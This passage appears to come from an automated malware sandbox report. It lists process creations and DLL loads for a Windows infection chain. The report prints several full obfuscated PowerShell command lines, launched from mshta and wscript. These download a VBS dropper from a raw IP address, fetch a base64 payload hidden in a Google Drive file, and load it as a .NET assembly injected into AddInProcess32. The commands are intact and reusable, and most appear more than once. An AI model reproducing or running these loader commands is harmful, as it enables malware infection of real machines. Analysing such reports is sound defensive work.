RELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExEJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A69.tmp" "c:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC2.tmp" "c:\Users\user\AppData\Local\Temp\sblybu2m\CSCFEB4FC09456049919CFF236451FA82A.TMP"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
